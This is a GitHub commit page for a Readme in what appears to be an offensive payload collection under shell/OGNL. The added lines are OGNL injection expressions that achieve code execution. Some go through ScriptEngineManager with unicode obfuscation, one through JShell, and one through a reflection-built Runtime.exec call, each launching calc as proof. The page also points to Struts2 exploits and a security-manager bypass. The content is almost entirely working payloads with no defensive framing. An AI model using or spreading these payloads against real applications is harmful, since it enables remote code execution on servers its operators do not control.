Skip to content

Commit f28035c

Browse files
authored
Update Readme.md
1 parent 56c34fd commit f28035c

1 file changed

Lines changed: 4 additions & 0 deletions

File tree

shell/OGNL/Readme.md

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -3,7 +3,11 @@
33
new javax.script.ScriptEngineManager().getEngineByName("js").eval(此处的Payload可以进行unicode编码)
44

55
new javax.script.ScriptEngineManager().getEngineByName("js").eval("new j\u0061va.lang.ProcessBuilder['(java.l\u0061ng.String[])'](['cmd.exe','/c','calc']).start()\u003B");
6+
可参考s2的exp
7+
jdk9+
8+
@jdk.jshell.Jshell@create().eval('code');
69

10+
${(#cls = #this.getClass().forName("java.lang.Runtime")).(#rt=#cls.getDeclaredMethod("getRuntime",null).invoke(null,null)).(#exec=#cls.getDeclaredMethod("exec", this.getClass().forName("[Ljava.lang.String;"))).(#exec.invoke(#rt,"calc".split(",")))}
711
```
812
## bypass sm
913
参考 js的bypass

0 commit comments

Comments
 (0)